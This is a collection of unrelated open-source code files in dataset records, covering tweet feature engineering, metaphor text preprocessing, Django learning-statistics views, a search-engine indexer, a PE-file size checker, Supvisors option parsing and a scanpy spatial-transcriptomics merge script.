the features \n\"\"\"\n features_names = features.columns\n features = MaxAbsScaler().fit_transform(features)\n features = pd.DataFrame(features)\n features.columns = features_names\n\"\"\"\n\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\nFunctions to transform the text in vectors\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\n\n\n# We set up an Tfidf Vectorizer that will use the top 100 tokens from the tweets. We also remove stopwords.\n# To do that we have to fit our training dataset and then transform both the training and testing dataset. 
\n# Here we fit the vectorizer on the most retweeted tweets (first half) from the training dataset\n# Then we transform the training data set\ndef vectorizer_fit(data):\n vectorizer = TfidfVectorizer(max_features=features_vectorizer, stop_words=stopwords.words('french')) \n vectorizer.fit(data['text'])\n text_data_vect = vectorizer.transform(data['text']).toarray()\n return text_data_vect, vectorizer\n\n# Here we transform the text in a vector based from the vectorizer trained above\ndef vectorizer_tf_test(data, vectorizer):\n text_data_vect = vectorizer.transform(data['text']).toarray()\n return text_data_vect\n\n# create an embedding dict from pretrained glove on words from tweets to vectors in 200 D\ndef creation_embedding_dict():\n embed_dict = {}\n with open('embeddings/glove.twitter.27B.200d.txt','r') as f:\n for line in f:\n values = line.split()\n word = values[0]\n vector = np.asarray(values[1:],'float32')\n embed_dict[word]=vector\n return embed_dict\n\n# transform tweets in vectors by taking the mean of the vectors of each words from the tweets \ndef tweet_to_vec(tweet, embed_dict):\n final_vec = np.zeros(200)\n for word in tweet:\n try:\n final_vec += embed_dict[word]\n except KeyError:\n pass\n return final_vec/len(tweet)\n\n# get all the tweets embbedded\ndef get_embeds(data, embed_dict):\n clean_data = cleaning(data)\n token_data = tokenize(clean_data)\n text_embeds = token_data['text'].apply(lambda x : tweet_to_vec(x,embed_dict))\n df_text_embeds = text_embeds.apply(pd.Series)\n df_text_embeds.columns = [f'embedding_{i}' for i in range(200)]\n return df_text_embeds\n\n\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\nFunctions to get train and test datasets\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n \n# method = ['textblob','vader','all']\n# function to get X_train\ndef get_X_train_df(dataset,method,embed_dict, freq_tags = None):\n features, dic_tags = feat_creation(dataset,method, freq_tags)\n text, vectorizer = vectorizer_fit(dataset)\n df_text_embeds = get_embeds(dataset, embed_dict)\n vect_text = pd.DataFrame(text,index = features.index)\n vect_text.columns = [f'vector_{i}' for i in range(features_vectorizer)]\n X_final_df = pd.concat([features,vect_text,df_text_embeds], axis=1)\n X_final_df = X_final_df.drop(columns=['retweets_count'])\n return X_final_df, dic_tags, vectorizer\n\n# function to get X_test\ndef get_X_test_df(dataset,method, vectorizer,embed_dict, freq_tags):\n features, dic_tags = feat_creation(dataset,method, freq_tags)\n text = vectorizer_tf_test(dataset, vectorizer)\n df_text_embeds = get_embeds(dataset, embed_dict)\n vect_text = pd.DataFrame(text,index = features.index)\n vect_text.columns = [f'vector_{i}' for i in range(features_vectorizer)]\n X_final_df = pd.concat([features,vect_text,df_text_embeds], axis=1)\n return X_final_df, dic_tags\n\n\n\n# function to get all the datasets\ndef get_all_df(X_train, X_test, eval_data, method = 'all'):\n embed_dict = creation_embedding_dict()\n print('Embedding matrix created ! \\n')\n X_test = X_test.drop(columns=['retweets_count'])\n X_train = X_train.drop_duplicates()\n X_train, dic_tags, vectorizer = get_X_train_df(X_train,method,embed_dict)\n print('Features created for X_train ! \\n')\n X_test, final_freq_tags = get_X_test_df(X_test,method,vectorizer,embed_dict, dic_tags)\n print('Features created for X_test ! 
\\n')\n X_eval, dic = get_X_test_df(eval_data,method,vectorizer,embed_dict, final_freq_tags)\n print('Features created for X_eval ! \\n')\n return X_train, X_test, X_eval\n ","repo_name":"ArthurDivanovic/Retweet-predictions","sub_path":"scripts/features_creations.py","file_name":"features_creations.py","file_ext":"py","file_size_in_byte":10422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27955638085","text":"import pandas as pd\nimport numpy as np\nimport regex as re\nimport spacy\nimport en_core_web_lg\n\n\ndef preprocess_column(raw_texts):\n \"\"\"\n Preprocess the metaphor column by preprocessing each metaphor and returning\n the resulting array\n Args:\n raw_texts: (list(string)) the metaphors to be processed\n \"\"\"\n nlp = en_core_web_lg.load()\n return [preprocess_text(s,nlp) for s in raw_texts]\n\ndef preprocess_text(raw_text,nlp):\n \"\"\"\n Preprocesses the raw metaphor by removing sotp words and lemmatizing the words\n Args:\n raw_text: (string) the original metaphor text to be processed\n nlp: (spacy language object)\n \"\"\"\n \n tokens=[]\n for token in nlp(raw_text):\n if not token.is_stop:\n tokens.append(token.lemma_)\n return \" \".join(tokens)\n\ndef trim_text(t):\n \"\"\"\n finds the beginning and ending of a number in the original string and slices out the number\n Args:\n t: (string) token to be processed\n \"\"\"\n\n if len(t)<1:\n return t\n start_index=0\n end_index=len(t)-1\n while not t[start_index].isnumeric() and start_index-1:\n end_index-=1\n return t[start_index:end_index+1].replace(\",\",'.')\n\ndef read_text(file):\n \"\"\"\n Read the katz dataset from the txt file provided\n Args:\n file: (string) file path\n \"\"\"\n\n columns=[\"M\",\"tenor\",\"vehicle\",\"label\",\"CMP\",\"ESI\",\"MET\",\"MGD\",\"SRL\",\"MIM\",\"IMS\",\"IMP\",\"FAM\",\"ALT\"]\n columns_dict={k:[]for k in columns}\n lengths=[]\n with open(file,'r') as f:\n f.readline()\n for line in f.readlines():\n line_values=line.split(\",\")\n line_values_numbers=[trim_text(s) for s in \",\".join(line_values[4:]).split(\"\\\"\") if s != ',' and s !='\\n']\n # print(line_values_numbers)\n matches=re.findall('^\\d,|\\\"\\d+,\\d+\\\"|,\\d,|,\\d$', \",\".join(line_values[4:]),overlapped=True)\n if len(matches)!=10:\n print(line)\n continue\n \n lengths.append(len(matches))\n line_values=line_values[:4]+[trim_text(s) for s in matches]\n for j in range(len(columns)):\n if j>2:\n columns_dict[columns[j]].append(float(line_values[j]))\n else:\n columns_dict[columns[j]].append(line_values[j])\n f.close()\n return pd.DataFrame(columns_dict)\n","repo_name":"younader/LiteraryMetaphorDetection","sub_path":"src/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"43460087928","text":"from django.contrib.auth import get_user_model\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework import generics\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom .models import LearningSession, QuestionStatistic\nfrom .serializers import (LearningSessionListSerializer,\n LearningSessionSerializer,\n LearningSessionCreateSerializer,\n QuestionStatisticSerializer,\n QuestionStatisticDetailSerializer)\n\nUser = get_user_model()\n\n\nclass LearningSessionListAPIView(generics.ListCreateAPIView):\n serializer_class = LearningSessionCreateSerializer\n\n def 
get_queryset(self):\n return LearningSession.objects.filter(\n user=self.request.user\n )\n\n def perform_create(self, serializer):\n qs = LearningSession.objects.filter(user=self.request.user)\n for session in qs:\n session.is_active = False\n session.save()\n\n serializer.save(\n user=self.request.user,\n is_active=True\n )\n\n\nclass LearningSessionDetailAPIView(generics.RetrieveAPIView):\n serializer_class = LearningSessionSerializer\n\n def get_queryset(self):\n return LearningSession.objects.filter(\n user=self.request.user\n )\n\n\nclass StatisticsListAPIView(generics.ListAPIView):\n serializer_class = QuestionStatisticSerializer\n\n def get_queryset(self):\n return QuestionStatistic.objects.filter(\n learning_session=self.kwargs.get('pk'))\n\n\nclass StatisticsDetailAPIView(generics.RetrieveAPIView):\n serializer_class = QuestionStatisticDetailSerializer\n\n def get_queryset(self):\n return QuestionStatistic.objects.filter(\n learning_session=self.kwargs.get('pk'))\n\n def get_object(self):\n qs = self.get_queryset()\n return get_object_or_404(qs, id=self.kwargs.get('pk_question'))\n\n\nclass StatisticsAnswerAPIView(APIView):\n \"\"\"GET: Add correct/wrong answer statistics\n /correct/ => correct_answers += 1\n /wrong/ => wrong_answers += 1\n If objects replies <= 0 only return data\n \"\"\"\n\n def get(self, request, pk=None, pk_question=None, answer=None):\n obj = get_object_or_404(QuestionStatistic,\n learning_session=pk,\n id=pk_question\n )\n if obj.replies > 0:\n if answer == 'correct':\n obj.correct_answers += 1\n obj.replies -= 1\n else:\n obj.wrong_answers += 1\n obj.replies += 1\n obj.save()\n\n return Response({'correct_answers': obj.correct_answers,\n 'wrong_answers': obj.wrong_answers,\n 'replies': obj.replies\n })\n\n","repo_name":"mgodkowicz/Django-Testownik","sub_path":"learn/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27089312716","text":"# Authors:\n# Tiago Rainho - 92984\n# Vasco Sousa - 93049\n\n\nimport time\nfrom models.parser import Parser\nfrom models.ranker import RankerFactory,RankingMethod\nfrom models.posting_list import PostingType\nfrom models.spimi import Spimi\nfrom models.tokenizer import Tokenizer\nfrom argparse import ArgumentParser\nimport os\n\ncurrent_time = time.time()\nBLOCK_DIR = 'cache/blocks'\nOUTPUT_INDEX = f'cache/index/{current_time}.index'\nDOC_MAPPING_FILE = f'cache/mappings/docs_mapping_{current_time}.map'\n\n\ndef index(stop_words,min_token_length,language,documents,posting_list_type,max_block_size,max_ram,ranking_method,schema,bm25_k,bm25_b):\n ranker = None\n if ranking_method != None:\n ranker = RankerFactory(ranking_method)(posting_list_type, schema=schema, k=bm25_k, b=bm25_b)\n\n indexer = Spimi(ranker=ranker, max_ram_usage=max_ram, max_block_size=max_block_size,\n auxiliary_dir=BLOCK_DIR, posting_type=posting_list_type)\n \n indexer.extend_metadata({\n 'posting_class': posting_list_type.value,\n 'min_token_length': min_token_length,\n 'stop_words': stop_words,\n 'language': language,\n 'doc_mapping': DOC_MAPPING_FILE\n })\n\n tokenizer = Tokenizer(min_token_length, stop_words, language)\n\n counter:int = 0\n with open(DOC_MAPPING_FILE, 'w', encoding='utf-8') as mapping_file:\n\n for document in documents:\n parser = Parser(document, 'review_id', ['review_headline', 'review_body'])\n parser_generator = parser.parse('\\t')\n\n print(f\"Start 
{str(posting_list_type).lower().replace('postingtype.','')} indexing...\")\n \n start = time.perf_counter()\n for doc_id, parsed_text in parser_generator:\n tokens = tokenizer.tokenize(parsed_text)\n indexer.add_document(doc_id=counter, tokens=tokens)\n mapping_file.write(f'{counter} {doc_id}\\n')\n counter += 1\n \n index = indexer.construct_index(OUTPUT_INDEX)\n end = time.perf_counter()\n print(\n f\"End file indexing {round((end-start), 3)} seconds with {indexer.block_number} temporary file{'s' if indexer.block_number != 1 else ''}\")\n\n indexer.clear_blocks()\n\n return index\n\ndef parse_args():\n arg_parser = ArgumentParser()\n arg_parser.add_argument(\n \"--stop-words\",\n default=None,\n dest=\"stop_words\",\n help=\"Path to a file that contains a list of stop words\",\n required=False\n )\n arg_parser.add_argument(\n \"--min-token-length\",\n default=0,\n type=int,\n dest=\"min_token_length\",\n help=\"Minimium number of chars that a token must have to be indexed\",\n required=False\n )\n arg_parser.add_argument(\n \"--language\",\n type=str,\n default=None,\n dest=\"language\",\n help=\"Language of the documents, needed to apply snow_stemmer\",\n required=False\n )\n arg_parser.add_argument(\n \"--documents\",\n nargs=\"*\",\n dest=\"documents\",\n help=\"List of paths to the .gz documents that are going to be indexed\",\n required=False\n )\n arg_parser.add_argument(\n \"--posting-list-type\",\n dest=\"posting_list_type\",\n type=PostingType,\n default=PostingType.FREQUENCY,\n help=\"Type of posting list to be used inside the indexer, can be either 'boolean', 'frequency' or 'positional'\",\n required=False\n )\n arg_parser.add_argument(\n \"--max-block-size\",\n dest=\"max_block_size\",\n type=int,\n default=50000,\n help=\"Maximum number of terms inside each temporary block\",\n required=False\n )\n arg_parser.add_argument(\n \"--max-ram\",\n dest=\"max_ram\",\n type=int,\n default=95,\n help=\"Maximum amount of ram usage permited before writting temporary files\",\n required=False\n )\n arg_parser.add_argument(\n \"--ranker\",\n type=RankingMethod,\n dest=\"ranking_method\",\n help=\"Ranking method to use while indexing and searching\",\n required=False,\n default=None\n )\n arg_parser.add_argument(\n \"--k\",\n type=float,\n dest=\"bm25_k\",\n help=\"K value for the BM25 ranking method\",\n required=False,\n default=0.75\n )\n arg_parser.add_argument(\n \"--b\",\n type=float,\n dest=\"bm25_b\",\n help=\"B value for the BM25 ranking method\",\n required=False,\n default=0.5\n )\n arg_parser.add_argument(\n \"--schema\",\n type=str,\n dest=\"schema\",\n help=\"schema for the TF-IDF Ranker\",\n required=False,\n default='lnc.ltc'\n )\n return arg_parser.parse_args()\n\nif __name__ == '__main__':\n # create the auxiliary directories when they do not exist\n os.makedirs(f\"cache\", exist_ok=True)\n for dir in ['blocks', 'index', 'mappings']:\n os.makedirs(f\"cache/{dir}\", exist_ok=True)\n\n args = parse_args()\n index(args.stop_words,args.min_token_length,args.language,args.documents,args.posting_list_type,args.max_block_size,args.max_ram,args.ranking_method,args.schema,args.bm25_k,args.bm25_b)","repo_name":"tiagorainho/SearchEngine","sub_path":"src/indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":5230,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1442142561","text":"#! 
/usr/bin/env python\nfrom pecli.lib.display import display_sections\nfrom pecli.plugins.base import Plugin\n\n\nclass PluginSize(Plugin):\n name = \"checksize\"\n description = \"Check size of the PE file\"\n\n def get_pe_size(self, pe, verbose=True):\n \"\"\"Return the PE size obtained from the file itself\"\"\"\n return max(map(lambda x: x.PointerToRawData + x.SizeOfRawData, pe.sections))\n\n def add_arguments(self, parser):\n parser.add_argument('--quiet', '-q', action='store_true', help='Quiet output')\n parser.add_argument('--extra', '-e', help='Dump extra data in another file')\n parser.add_argument('--write', '-w', help='Copy the file with the right size')\n self.parser = parser\n\n def run(self, args, pe, data):\n if not args.quiet:\n display_sections(pe)\n\n size = self.get_pe_size(pe)\n if len(data) > size:\n print(\"%i bytes of extra data (%i while it should be %i)\" % (\n len(data) - size,\n len(data),\n size\n ))\n if args.write is not None:\n fout = open(args.write, 'wb')\n fout.write(data[:size])\n fout.close()\n print('Correct PE dumped in %s' % args.write)\n if args.extra is not None:\n fout = open(args.extra, 'wb')\n fout.write(data[size:])\n fout.close()\n print('Dumped extra data in %s' % args.extra)\n else:\n if len(data) == size:\n print('Correct size')\n else:\n print(\"File too short (%i while it should be %i)\" % (len(data), size))\n\n if args.write is not None or args.extra is not None:\n print('No extradata, can\\'t do anything for you, sorry!')\n","repo_name":"Te-k/pecli","sub_path":"pecli/plugins/checksize.py","file_name":"checksize.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"53"} +{"seq_id":"33948646048","text":"from collections import OrderedDict\nfrom socket import gethostname\n\nfrom supervisor.datatypes import boolean, integer, existing_dirpath, byte_size, logging_level, list_of_strings\nfrom supervisor.options import ServerOptions\n\nfrom supvisors.ttypes import ConciliationStrategies, DeploymentStrategies\n\n\n# Options of main section\nclass SupvisorsOptions():\n \"\"\" Holder of the Supvisors options.\n\n Attributes are:\n - address_list: list of host names or IP addresses where supvisors will be running,\n - deployment_file: absolute or relative path to the XML deployment file,\n - internal_port: port number used to publish local events to remote Supvisors instances,\n - event_port: port number used to publish all Supvisors events,\n - auto_fence: when True, Supvisors won't try to reconnect to a Supvisors instance that has been inactive,\n - synchro_timeout: time in seconds that Supvisors waits for all expected Supvisors instances to publish,\n - conciliation_strategy: strategy used to solve conflicts when Supvisors has detected that multiple instances of the same program are running,\n - deployment_strategy: strategy used to start applications on addresses,\n - stats_periods: list of periods for which the statistics will be provided in the Supvisors web page,\n - stats_histo: depth of statistics history,\n - logfile: absolute or relative path of the Supvisors log file,\n - logfile_maxbytes: maximum size of the Supvisors log file,\n - logfile_backups: number of Supvisors backup log files,\n - loglevel: logging level,\n\n - procnumbers: a dictionary giving the number of the program in a homogeneous group.\n \"\"\"\n\n def __init__(self):\n \"\"\" Initialization of the attributes. 
\"\"\"\n self.procnumbers = {}\n\n def __str__(self):\n \"\"\" Contents as string. \"\"\"\n return ('address_list={} deployment_file={} internal_port={} event_port={} auto_fence={} synchro_timeout={} '\n 'conciliation_strategy={} deployment_strategy={} stats_periods={} stats_histo={} '\n 'logfile={} logfile_maxbytes={} logfile_backups={} loglevel={}'.format(self.address_list,\n self.deployment_file, self.internal_port, self.event_port, self.auto_fence, self.synchro_timeout, \n self.conciliation_strategy, self.deployment_strategy, self.stats_periods, self.stats_histo,\n self.logfile, self.logfile_maxbytes, self.logfile_backups, self.loglevel))\n\n\nclass SupvisorsServerOptions(ServerOptions):\n \"\"\" Class used to parse the options of the 'supvisors' section in the supervisor configuration file.\n\n Attributes are:\n - supvisors_options: the instance holding all Supvisors options,\n - _Section: constant for the name of the Supvisors section in the Supervisor configuration file.\n \"\"\"\n\n _Section = 'supvisors'\n\n def __init__(self):\n \"\"\" Initialization of the attributes. \n Default parameters fit, so realize is called directly. \"\"\"\n ServerOptions.__init__(self)\n self.supvisors_options = SupvisorsOptions()\n\n def _processes_from_section(self, parser, section, group_name, klass=None):\n \"\"\" This method is overriden to store the program number of a homogeneous program.\n This is used in Supervisor to set the real program name from the format defined in the ini file.\n However, Supervisor does not keep this information in its internal structure. \"\"\"\n # call super behaviour\n programs = ServerOptions._processes_from_section(self, parser, section, group_name, klass)\n # store the number of each program\n for idx, program in enumerate(programs):\n self.supvisors_options.procnumbers[program.name] = idx\n # return original result\n return programs\n\n def server_configs_from_parser(self, parser):\n \"\"\" The following has nothing to deal with Supervisor's server configurations.\n It gets Supvisors configuration.\n Supervisor's ServerOptions has not been designed to be specialized.\n This method is overriden just to have an access point to the Supervisor parser. 
\"\"\"\n configs = ServerOptions.server_configs_from_parser(self, parser)\n # set section\n if not parser.has_section(self._Section):\n raise ValueError('section [{}] not found in ini file {}'.format(self._Section))\n temp, parser.mysection = parser.mysection, self._Section\n # get values\n opt = self.supvisors_options\n opt.address_list = list(OrderedDict.fromkeys(filter(None, list_of_strings(parser.getdefault('address_list', gethostname())))))\n opt.deployment_file = existing_dirpath(parser.getdefault('deployment_file', ''))\n opt.internal_port = self.to_port_num(parser.getdefault('internal_port', '65001'))\n opt.event_port = self.to_port_num(parser.getdefault('event_port', '65002'))\n opt.auto_fence = boolean(parser.getdefault('auto_fence', 'false'))\n opt.synchro_timeout = self.to_timeout(parser.getdefault('synchro_timeout', '15'))\n opt.conciliation_strategy = self.to_conciliation_strategy(parser.getdefault('conciliation_strategy', 'USER'))\n opt.deployment_strategy = self.to_deployment_strategy(parser.getdefault('deployment_strategy', 'CONFIG'))\n # configure statistics\n opt.stats_periods = self.to_periods(list_of_strings(parser.getdefault('stats_periods', '10')))\n opt.stats_histo = self.to_histo(parser.getdefault('stats_histo', 200))\n # configure logger\n opt.logfile = existing_dirpath(parser.getdefault('logfile', '{}.log'.format(self._Section)))\n opt.logfile_maxbytes = byte_size(parser.getdefault('logfile_maxbytes', '50MB'))\n opt.logfile_backups = integer(parser.getdefault('logfile_backups', 10))\n opt.loglevel = logging_level(parser.getdefault('loglevel', 'info'))\n # reset mysection and return original result\n parser.mysection = temp\n return configs\n\n # conversion utils (completion of supervisor.datatypes)\n @staticmethod\n def to_port_num(value):\n \"\"\" Convert a string into a port number. \"\"\"\n value = integer(value)\n if 0 < value <= 65535:\n return value\n raise ValueError('invalid value for port: %d. expected in [1;65535]' % value)\n\n @staticmethod\n def to_timeout(value):\n \"\"\" Convert a string into a timeout value. \"\"\"\n value = integer(value)\n if 0 < value <= 1000:\n return value\n raise ValueError('invalid value for synchro_timeout: %d. expected in [1;1000] (seconds)' % value)\n\n @staticmethod\n def to_conciliation_strategy(value):\n \"\"\" Convert a string into a ConciliationStrategies enum. \"\"\"\n strategy = ConciliationStrategies._from_string(value)\n if strategy is None:\n raise ValueError('invalid value for conciliation_strategy: {}. expected in {}'.format(value, ConciliationStrategies.values()))\n return strategy\n\n @staticmethod\n def to_deployment_strategy(value):\n \"\"\" Convert a string into a DeploymentStrategies enum. \"\"\"\n strategy = DeploymentStrategies._from_string(value)\n if strategy is None:\n raise ValueError('invalid value for deployment_strategy: {}. expected in {}'.format(value, DeploymentStrategies.values()))\n return strategy\n\n @staticmethod\n def to_periods(value):\n \"\"\" Convert a string into a list of period values. \"\"\"\n if len(value) > 3:\n raise ValueError('unexpected number of periods: {}. maximum is 3'.format(value))\n periods = [ ]\n for val in value:\n period = integer(val)\n if 5 > period or period > 3600:\n raise ValueError('invalid value for period: {}. expected in [5;3600] (seconds)'.format(val))\n if period % 5 != 0:\n raise ValueError('invalid value for period: %d. 
expected multiple of 5' % period)\n periods.append(period)\n return sorted(filter(None, periods))\n\n @staticmethod\n def to_histo(value):\n \"\"\" Convert a string into a value of historic depth. \"\"\"\n histo = integer(value)\n if 10 <= histo <= 1500:\n return histo\n raise ValueError('invalid value for histo: {}. expected in [10;1500] (seconds)'.format(value))\n","repo_name":"danh1979/supvisors","sub_path":"supvisors/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":8381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"32376322213","text":"def save_to_file(file_name, book_search):\n file = open(f\"{file_name}.csv\", \"w\", encoding=\"utf-8-sig\")\n file.write(\"name,author,price,link\\n\")\n\n for info in book_search:\n book_name = info['book_name']\n book_author = info['book_author']\n book_price = info['book_price']\n book_link = info['book_link']\n\n # 가격 정보를 따옴표로 감싸서 저장\n file.write(f\"\\\"{book_name}\\\",\\\"{book_author}\\\",\\\"{book_price}\\\",\\\"{book_link}\\\"\\n\")\n\n file.close()","repo_name":"HOPE-syc/python_web_scraping_study","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70508034728","text":"# import imp\nfrom string import whitespace\nfrom tkinter import font\nfrom turtle import width\nimport scanpy as sc\nimport scanpy.external as sce\nfrom utils import get_meta_data\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\nimport utils\nimport os\nimport argparse\nimport warnings\n\n\nwarnings.simplefilter(action='ignore')\nsc.settings.verbosity = 0\n\n'''\nOpen all samples QC processed files, merge them\n'''\n\n############################### BOOOORIING STUFF BELOW ############################### \n# Warning settings\nwarnings.simplefilter(action='ignore')\nsc.settings.verbosity = 0\n# Set figure params\nsc.set_figure_params(scanpy=True, facecolor=\"white\", fontsize=8, dpi=80, dpi_save=300)\nplt.rcParams['figure.constrained_layout.use'] = True\n# Read command line and set args\nparser = argparse.ArgumentParser(prog='merge', description='Run Merging')\nparser.add_argument('-i', '--input_dir', help='Input directory containing the preprocessed AnnData object ', required=True)\nparser.add_argument('-o', '--output_dir', help='Output directory where to store the processed object', required=True)\nparser.add_argument('-n', '--normalization', default=\"log1p\", help='Normalization technique', required=False)\nparser.add_argument('-an', '--analysis_name', help='Analysis name', required=True)\nargs = vars(parser.parse_args())\ninput_path = args['input_dir']\noutput_path = args['output_dir']\nnormalization = args['normalization']\nanalysis_name = args['analysis_name'] # \"visium_merge\"\n# Get necesary paths and create folders if necessary\nS_PATH, DATA_PATH, OUT_DATA_PATH, PLOT_PATH = utils.set_n_return_paths(analysis_name)\n############################### BOOOORIING STUFF ABOVE ###############################\n\nsample_type = \"visium\"\n# Load meta data\nmeta = utils.get_meta_data(sample_type)\nsamples = np.unique(meta['sample_id'])\n\n# put the samples in a list\n# mpl.rcParams['figure.dpi']= 150\n\nmarkers_df = pd.read_csv(os.path.join(DATA_PATH, \"marker_genes.txt\"), sep=\"\\t\")\nmarkers = list(set(markers_df[\"genesymbol\"].str.capitalize()))\n\nadatas = []\n\nadata = []\n# for 
sample in os.listdir(input_path):\nfor sample in samples:\n\n tmp = sc.read_h5ad(os.path.join(input_path,f\"{sample}_filtered.h5ad\"))\n\n # Fetch sample metadata\n m = meta[meta['sample_id'] == sample]\n \n # Add metadata to adata\n for col in m.columns:\n tmp.obs[col] = m[col].values[0]\n\n # Append\n adata.append(tmp)\n del tmp\n \n# Merge objects and delete list\nadata = adata[0].concatenate(adata[1:], join='outer')\nsc.pp.calculate_qc_metrics(adata, inplace=True)\n\n\n\"\"\"\nfig, axes = plt.subplots(1, 6, figsize=(12, 6))\nfor ax, sample in zip(axes, samples):\n\n adata = sc.read_h5ad(os.path.join(input_path,f\"{sample}_filtered.h5ad\"))\n # adata.var.index = pd.Index(gen.capitalize() for gen in tmp.var.index.values)\n sc.experimental.pp.highly_variable_genes(\n adata, flavor=\"pearson_residuals\", n_top_genes=4000\n )\n \n # Fetch sample metadata\n m = meta[meta['sample_id'] == sample] \n # Add metadata to adata\n for col in m.columns:\n adata.obs[col] = m[col].values[0]\n \n hvgs = adata.var[\"highly_variable\"]\n # print(hvgs)\n ax.scatter(\n adata.var[\"mean_counts\"], adata.var[\"residual_variances\"], s=3, edgecolor=\"none\"\n )\n ax.scatter(\n adata.var[\"mean_counts\"][hvgs],\n adata.var[\"residual_variances\"][hvgs],\n c=\"tab:red\",\n label=\"selected genes\",\n s=3,\n edgecolor=\"none\",\n )\n ax.scatter(\n adata.var[\"mean_counts\"][np.isin(adata.var_names, markers)],\n adata.var[\"residual_variances\"][np.isin(adata.var_names, markers)],\n c=\"k\",\n label=\"known marker genes\",\n s=10,\n edgecolor=\"none\",\n )\n ax.set_xscale(\"log\")\n ax.set_xlabel(\"mean expression\")\n ax.set_yscale(\"log\")\n ax.set_ylabel(\"residual variance\")\n # print(adata.obs[\"condition\"][0])\n # ax.set_title(adata.uns[\"name\"])\n ax.set_title(adata.obs[\"condition\"][0])\n\n ax.spines[\"right\"].set_visible(False)\n ax.spines[\"top\"].set_visible(False)\n ax.yaxis.set_ticks_position(\"left\")\n ax.xaxis.set_ticks_position(\"bottom\")\n\n adatas.append(adata)\n del adata\n\nplt.legend()\n\n\nfor adata in adatas:\n adata = adata[:, adata.var[\"highly_variable\"]]\n sc.experimental.pp.normalize_pearson_residuals(adata)\n\n\nfor adata in adatas:\n # Run PCA\n sc.pp.scale(adata)\n sc.tl.pca(adata, svd_solver='arpack', random_state=0)\n n_cells = len(adata)\n \n\nfor adata in adatas:\n sc.pp.neighbors(adata)\n sc.tl.umap(adata)\n sc.tl.leiden(adata)\n\nfor adata in adatas:\n print(adata.obs[\"condition\"][0], \":\")\n sc.pl.umap(adata, color=[\"leiden\"], cmap=\"tab20\")\n sc.pl.umap(adata, color=list(set(adata.var.index) & set(markers)), layer=\"sqrt_norm\")\n\"\"\"\n\n\nsc.pl.violin(adata, ['n_genes_by_counts', 'total_counts'],\n wspace=0.3, jitter=0.4, size=0.5, groupby=\"condition\", rotation=75, show=True, save=f\"QC_on_merged_objects_after_filtering_{sample_type}_violin.pdf\")\n\n# adata.obs['outlier_total'] = adata.obs.total_counts > 30000\n# print('%u cells with large total counts' % (sum(adata.obs['outlier_total'])))\n# adata_pbmc3k = adata[~adata.obs['outlier_total'], :]\n\n# keep raw counts in layers\nadata.layers['counts'] = adata.X.copy()\nadata.layers[\"sqrt_norm\"] = np.sqrt(\n sc.pp.normalize_total(adata, inplace=False)[\"X\"]).copy()\n\nadata.layers[\"log1p_transformed\"] = sc.pp.normalize_total(adata, inplace=False, target_sum=1e6)[\"X\"]\nsc.pp.log1p(adata, layer=\"log1p_transformed\")\n\n\n\n\"\"\"\n# TODO: Try other normalization techniques\nif normalization == \"log1p\":\n\n # Log-normalize expression\n sc.pp.normalize_total(adata, target_sum=1e6)\n sc.pp.log1p(adata)\n 
adata.layers['normalized'] = adata.X\nelif normalization == \"pearson\":\n sc.experimental.pp.highly_variable_genes(\n adata, batch_key='batch', flavor=\"pearson_residuals\", n_top_genes=3000\n )\nelse:\n # TODO: throw an error\n pass\n # throw NotImplementedError \"\"\"\n\n\n# 4000 di\n# adata.var.index = pd.Index(gen.capitalize() for gen in tmp.var.index.values)\nsc.experimental.pp.highly_variable_genes(\n adata, batch_key='batch', flavor=\"pearson_residuals\", n_top_genes=3000\n)\n\n\n\nfig, ax = plt.subplots(1, 1, figsize=(12, 6))\nhvgs = adata.var[\"highly_variable\"]\n\nax.scatter(\n adata.var[\"mean_counts\"], adata.var[\"residual_variances\"], s=3, edgecolor=\"none\"\n)\nax.scatter(\n adata.var[\"mean_counts\"][hvgs],\n adata.var[\"residual_variances\"][hvgs],\n c=\"tab:red\",\n label=\"selected genes\",\n s=3,\n edgecolor=\"none\",\n)\nax.scatter(\n adata.var[\"mean_counts\"][np.isin(adata.var_names, markers)],\n adata.var[\"residual_variances\"][np.isin(adata.var_names, markers)],\n c=\"k\",\n label=\"known marker genes\",\n s=10,\n edgecolor=\"none\",\n)\nax.set_xscale(\"log\")\nax.set_xlabel(\"mean expression\")\nax.set_yscale(\"log\")\nax.set_ylabel(\"residual variance\")\n# ax.set_title(adata.obs[\"condition\"][0])\n\nax.spines[\"right\"].set_visible(False)\nax.spines[\"top\"].set_visible(False)\nax.yaxis.set_ticks_position(\"left\")\nax.xaxis.set_ticks_position(\"bottom\")\nplt.legend()\n\ntxt=\"In the figure below, red dots show the selected genes (i.e. highly variable genes) and the black ones represent the marker 